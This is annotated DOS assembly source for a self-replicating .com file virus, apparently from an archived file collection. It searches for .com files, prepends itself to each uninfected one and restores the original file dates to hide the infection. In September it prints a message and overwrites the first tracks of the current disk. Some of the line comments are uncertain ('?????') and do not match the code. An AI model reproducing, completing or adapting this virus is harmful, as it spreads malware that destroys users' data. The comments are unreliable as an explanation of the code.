home *** CD-ROM | disk | FTP | other *** search
- ;
- ; ---- Data Segment Values ----
- ; ds:[0f6h] = read buffer location
- ; ds:[0f8h] = write buffer location
- ; ds:[0fah] = store length of virus at this location
- ; ds:[0fch] = store length of file to be infected at this location
- ; ds:[0feh] = filename of file to infect
- ;
-
- .model tiny
- .code
- org 100h ; origin for .com files
- start:
-
- nop ; these two nop instructs will be used by 'Nasty'
- nop ; to determine if a file is already infected
-
- ;******
- ;get date
- ;******
- mov ah,2ah ; get the date
- int 21h ; do it
- cmp dh,09h ; is it September?
- jnz do_not_activate ; if NO jmp do_not_activate
- ;****
- ;the nasty bit
- ;****
- ;*
- ;* 1. Print message
- ;*
- lea dx,mess ; print message
- mov ah,09 ; 'Nasty in September'
- int 21h ; do it
- ;****
- ;* 2. Destroy disk
- ;****
- mov ah,19h ; get current drive (returned in al)
- int 21h ; do it
- mov dl,al ; dl = drive # to be formated
- mov ah,05 ; disk format function
- mov cl,01 ; first sector
- mov ch,00 ; first track
- mov dh,00 ; head zero
- mov al,10h ; 10h (16) sectors - 2 tracks
- int 13h ; do it (overwrite first 16 tracks on currently
- ; selected disc)
-
-
- do_not_activate:
- mov cx,80h ; save parameters; set counter to 80h bytes
- mov si,0080h ; offset in the current data segment of the byte
- ; to be copied
- mov di,0ff7fh ; offset to which byte is to be moved
- rep movsb ; move bytes until cx=0 (decrement cx by 1 each time
- ; loop is performed is done automatically)
- ; (increment by 1 of si & di is done automatically)
-
- lea ax,begp ; load exit from program offset address into ax
- mov cx,ax ; " " " " " " " cx
- sub ax,100h ; subtract start of .com file address (100h) from ax
- ; ax now contains the length of the virus
-
- mov ds:[0fah],ax ; put length of the virus into the data segment at
- ; offset 0fah
- add cx,fso ; add fso (5h) to cx (offset address of exit)
- ; so, cx=cx+5
- mov ds:[0f8h],cx ; move cx (end of virus + 5) into data segment at
- ; offset 0f8h. ** Start of the write buffer.
- ADD CX,AX ; add virus length (ax) to cx ?????
- mov ds:[0f6h],cx ; mov cx into data segment at offset 0f6h.
- ; ** Start of the read buffer
- mov cx,ax ; mov length of virus into cx
- lea si,start ; load address of 'start' (start of virus) into
- ; souce index
- mov di,ds:[0f8h] ; mov the value of the write buffer (@ 0f8h) into
- ; destination index
-
-
- rb: ; cx = counter (length of virus)
- ; si = offset of byte to be read
- ; di = offset of where to write byte to
- ; (auto decrement of cx & increment of si & di)
- rep movsb ; copy the virus into memory
-
- stc ; set the carry flag
-
- lea dx,file_type_to_infect ; set infector for .com files only
- mov ah,4eh ; find first file with specified params
- mov cx,20h ; files with archive bit set
- int 21h ; do it
- ; if file found, CF is cleared, else
- ; CF is set
-
- or ax,ax ; works the below instructions (jz & jmp)
- jz file_found ; if file found jmp file_found
- jmp done ; if no file found, jmp done (exit virus)
-
- file_found:
- mov ah,2fh ; get dta (returned in es:bx)
- int 21h ; do it
-
- mov ax,es:[bx+1ah] ; mov size of file to be infected into ax
- mov ds:[0fch],ax ; mov filesize into ds:[0fch]
- add bx,1eh ; bx now points to asciz filename
- mov ds:[0feh],bx ; mov filename into ds:[0feh]
- clc ; clear carry flag
-
- mov ax,3d02h ; open file for r/w (ds:dx -> asciz filename)
- mov dx,bx ; mov filename into dx
- int 21h ; do it (ax contains file handle)
-
- mov bx,ax ; mov file handle into bx
-
- mov ax,5700h ; get time & date attribs from file to infect
- int 21h ; do it (file handle in bx)
- push cx ; save time to the stack
- push dx ; save date to the stack
-
- mov ah,3fh ; read from file to be infected
- mov cx,ds:[0fch] ; number of bytes to be read (filesize of file to
- ; be infected
- mov dx,ds:[0f6h] ; buffer (where to read bytes to)
- int 21h ; do it
-
- mov bx,dx ; mov buffer location to bx
- mov ax,[bx] ; mov contents of bx (first two bytes - as bx is
- ; 16-bits) into ax.
-
- ; Now check to see if file is infected... if the
- ; file is infected, it's first two bytes will be
- ; 9090h (nop nop)
-
- sub ax,9090h ; If file is already infected, zero flag will be set
- ; thus jump to fin(ish)
- jz fin
-
-
- mov ax,ds:[0fch] ; mov filesize of file to be infected into ax
- mov bx,ds:[0f6h] ; mov where-to-read-to buffer into bx
-
- mov [bx-2],ax ; correct old len
-
- mov ah,3ch ; Create file with handle
- mov cx,00h ; cx=attribs -- set no attributes
- mov dx,ds:[0feh] ; point to name
- clc ; clear carry flag
- int 21h ; create file
- ; Note: If filename already exists, (which it does)
- ; truncate the filelength to zero - this is ok as
- ; we have already copied the file to be infected
- ; into memory.
-
- mov bx,ax ; mov file handle into bx
- mov ah,40h ; write file with handle (write to the file to be
- ; infected) - length currently zero
- ; cx=number of bytes to write
- mov cx,ds:[0fch] ; length of file to be infected
- add cx,ds:[0fah] ; length of virus
- mov DX,ds:[0f8h] ; location of write buffer (this contains the virus
- ; + the file to be infected)
- int 21h ; write file
- ; new file = virus + file to be infected
-
- mov ax,5701h ; restore original time & date values
- pop dx ; get old date from the stack
- pop cx ; get old time from the stack
- int 21h ; do it
- ; Note: Infected file will now carry the time & date
- ; it had before the infection.
-
- mov ah,3eh ; close file (bx=file handle)
- int 21h ; do it
- ; Note: date & time stamps automatically updated if
- ; file written to.
-
- fin:
- stc ; set carry flags
- mov ah,4fh ; find next file (.com)
- int 21h ; do it
- or ax,ax ; decides zero flag outcome
- jnz done ; if no more .com files, jmp done
- JMP file_found ; else begin re-infection process for new file.
-
- done:
- mov cx,80h ; set counter (cx) = 80h
- mov si,0ff7fh ; source offset address (copy from here)
- mov di,0080h ; destination offset address (copy to here)
- rep movsb ; copy bytes! (cx is auto decremented by 1
- ; si & di are auto incremented by 1)
- ; Note: this is a 'restore parameters' feature
- ; this does the reverse of what what done earlier
- ; in the program (do_not_activate:)
-
- mov ax,0a4f3h ;
- mov ds:[0fff9h],ax ;
- mov al,0eah ;
- mov ds:[0fffbh],al ; reset data segment locations ??? (to previous
- mov ax,100h ; values before virus infection)
- mov ds:[0fffch],ax ;
- lea si,begp ; load exit from program offset address into si
- lea di,start ; load offset address of start of virus into di
- mov ax,cs
- mov ds:[0fffeh],ax ; re-align cs = ds ???
- mov kk,ax
- mov cx,fso
-
- db 0eah ; define byte
- dw 0fff9h ; define word
- kk dw 0000h ; define kk = word
-
- mess db 'Sad virus - 24/8/91',13,10,'$' ; virus message to display
-
- file_type_to_infect db '*?.com',0 ; infect only .com files.
-
- fso dw 0005h ; store 5 into 'fso'. dw means that fso is 2 bytes
- ; in size (a word)
- ; ----- alma mater
-
-
- begp:
- mov ax,4c00h ; normal dos termination (set al to 00)
- int 21h ; do it
-
- end start
- ��
